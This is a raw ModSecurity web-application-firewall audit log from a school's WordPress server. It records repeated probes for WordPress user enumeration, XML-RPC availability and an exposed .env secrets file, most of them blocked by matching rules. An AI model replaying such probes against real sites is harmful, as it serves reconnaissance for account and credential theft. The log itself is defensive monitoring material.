Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d92e4a6f-Z-- --dba26878-A-- [09/May/2025:22:40:49 +0700] aB4iAVoC-7ITMWTA_c9ekQAAAMw 103.236.140.4 56962 103.236.140.4 8181 --dba26878-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dba26878-C-- demo.sayHello --dba26878-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dba26878-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805249935340 5658 (- - -) Stopwatch2: 1746805249935340 5658; combined=4169, p1=502, p2=3516, p3=21, p4=22, p5=63, sr=74, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dba26878-Z-- --26fdf601-A-- [09/May/2025:22:42:06 +0700] aB4iTlqQ1nOVx9fWpZSxcQAAAAk 103.236.140.4 56986 103.236.140.4 8181 --26fdf601-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --26fdf601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26fdf601-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805326258586 3467 (- - -) Stopwatch2: 1746805326258586 3467; combined=1419, p1=465, p2=923, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26fdf601-Z-- --0c24fb0c-A-- [09/May/2025:22:42:12 +0700] aB4iVFoC-7ITMWTA_c9emQAAANU 103.236.140.4 56990 103.236.140.4 8181 --0c24fb0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c24fb0c-C-- demo.sayHello --0c24fb0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c24fb0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805332472952 6149 (- - -) Stopwatch2: 1746805332472952 6149; combined=4579, p1=595, p2=3697, p3=32, p4=34, p5=130, sr=100, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c24fb0c-Z-- --b1f03f0c-A-- [09/May/2025:22:43:17 +0700] aB4ilVoC-7ITMWTA_c9enwAAAMQ 103.236.140.4 57004 103.236.140.4 8181 --b1f03f0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1f03f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1f03f0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805397177169 2990 (- - -) Stopwatch2: 1746805397177169 2990; combined=1343, p1=459, p2=854, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1f03f0c-Z-- --e7417313-A-- [09/May/2025:22:43:24 +0700] aB4inFoC-7ITMWTA_c9eogAAAM4 103.236.140.4 57010 103.236.140.4 8181 --e7417313-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e7417313-C-- demo.sayHello --e7417313-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7417313-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805404546266 5000 (- - -) Stopwatch2: 1746805404546266 5000; combined=3791, p1=425, p2=3161, p3=20, p4=24, p5=93, sr=69, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7417313-Z-- --24ac804c-A-- [09/May/2025:22:44:59 +0700] aB4i-1oC-7ITMWTA_c9eqQAAAMk 103.236.140.4 57030 103.236.140.4 8181 --24ac804c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --24ac804c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24ac804c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805499474658 2240 (- - -) Stopwatch2: 1746805499474658 2240; combined=969, p1=321, p2=629, p3=0, p4=0, p5=19, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24ac804c-Z-- --6d43e435-A-- [09/May/2025:22:45:04 +0700] aB4jAFoC-7ITMWTA_c9erAAAAMw 103.236.140.4 57038 103.236.140.4 8181 --6d43e435-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6d43e435-C-- demo.sayHello --6d43e435-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d43e435-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805504520964 5850 (- - -) Stopwatch2: 1746805504520964 5850; combined=4313, p1=615, p2=3430, p3=33, p4=34, p5=119, sr=127, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d43e435-Z-- --ee056610-A-- [09/May/2025:22:48:58 +0700] aB4j6loC-7ITMWTA_c9eugAAAMI 103.236.140.4 57080 103.236.140.4 8181 --ee056610-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ee056610-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee056610-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805738076825 3182 (- - -) Stopwatch2: 1746805738076825 3182; combined=1402, p1=522, p2=849, p3=0, p4=0, p5=30, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee056610-Z-- --f28b7562-A-- [09/May/2025:22:49:06 +0700] aB4j8loC-7ITMWTA_c9euwAAAMQ 103.236.140.4 57084 103.236.140.4 8181 --f28b7562-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.156 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f28b7562-C-- demo.sayHello --f28b7562-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f28b7562-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805746139052 6114 (- - -) Stopwatch2: 1746805746139052 6114; combined=4494, p1=592, p2=3670, p3=34, p4=36, p5=97, sr=78, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f28b7562-Z-- --bbaa375b-A-- [09/May/2025:23:13:39 +0700] aB4ps1oC-7ITMWTA_c9fCgAAANM 103.236.140.4 57344 103.236.140.4 8181 --bbaa375b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bbaa375b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbaa375b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807219750774 2516 (- - -) Stopwatch2: 1746807219750774 2516; combined=1325, p1=409, p2=887, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbaa375b-Z-- --76afe201-A-- [09/May/2025:23:13:44 +0700] aB4puFoC-7ITMWTA_c9fDAAAAM8 103.236.140.4 57350 103.236.140.4 8181 --76afe201-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76afe201-C-- demo.sayHello --76afe201-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76afe201-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807224458395 3647 (- - -) Stopwatch2: 1746807224458395 3647; combined=2809, p1=353, p2=2301, p3=20, p4=20, p5=68, sr=53, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76afe201-Z-- --829f031e-A-- [09/May/2025:23:14:19 +0700] aB4p21oC-7ITMWTA_c9fEQAAANE 103.236.140.4 57362 103.236.140.4 8181 --829f031e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --829f031e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --829f031e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807259626381 2959 (- - -) Stopwatch2: 1746807259626381 2959; combined=1304, p1=457, p2=817, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --829f031e-Z-- --0ecc0435-A-- [09/May/2025:23:14:24 +0700] aB4p4C-fAO47ojYKsMr6DAAAAE8 103.236.140.4 57366 103.236.140.4 8181 --0ecc0435-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0ecc0435-C-- demo.sayHello --0ecc0435-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ecc0435-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807264207227 5157 (- - -) Stopwatch2: 1746807264207227 5157; combined=3833, p1=462, p2=3160, p3=22, p4=25, p5=95, sr=69, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ecc0435-Z-- --809bff6e-A-- [09/May/2025:23:14:58 +0700] aB4qAh6q_ZMebht3q14k_gAAAIE 103.236.140.4 57376 103.236.140.4 8181 --809bff6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --809bff6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --809bff6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807298448953 2608 (- - -) Stopwatch2: 1746807298448953 2608; combined=1189, p1=431, p2=729, p3=0, p4=0, p5=29, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --809bff6e-Z-- --b6931c18-A-- [09/May/2025:23:15:03 +0700] aB4qB1oC-7ITMWTA_c9fFwAAAME 103.236.140.4 57380 103.236.140.4 8181 --b6931c18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b6931c18-C-- demo.sayHello --b6931c18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6931c18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807303644509 5965 (- - -) Stopwatch2: 1746807303644509 5965; combined=4315, p1=582, p2=3507, p3=33, p4=36, p5=94, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6931c18-Z-- --534bec54-A-- [09/May/2025:23:15:44 +0700] aB4qLy-fAO47ojYKsMr6DQAAAEY 103.236.140.4 57392 103.236.140.4 8181 --534bec54-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.183.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.183.83 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --534bec54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --534bec54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746807343999740 714 (- - -) Stopwatch2: 1746807343999740 714; combined=264, p1=229, p2=0, p3=0, p4=0, p5=34, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --534bec54-Z-- --e2fa4743-A-- [09/May/2025:23:17:43 +0700] aB4qp1oC-7ITMWTA_c9fHwAAANA 103.236.140.4 57402 103.236.140.4 8181 --e2fa4743-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2fa4743-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2fa4743-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807463884830 2954 (- - -) Stopwatch2: 1746807463884830 2954; combined=1318, p1=472, p2=815, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
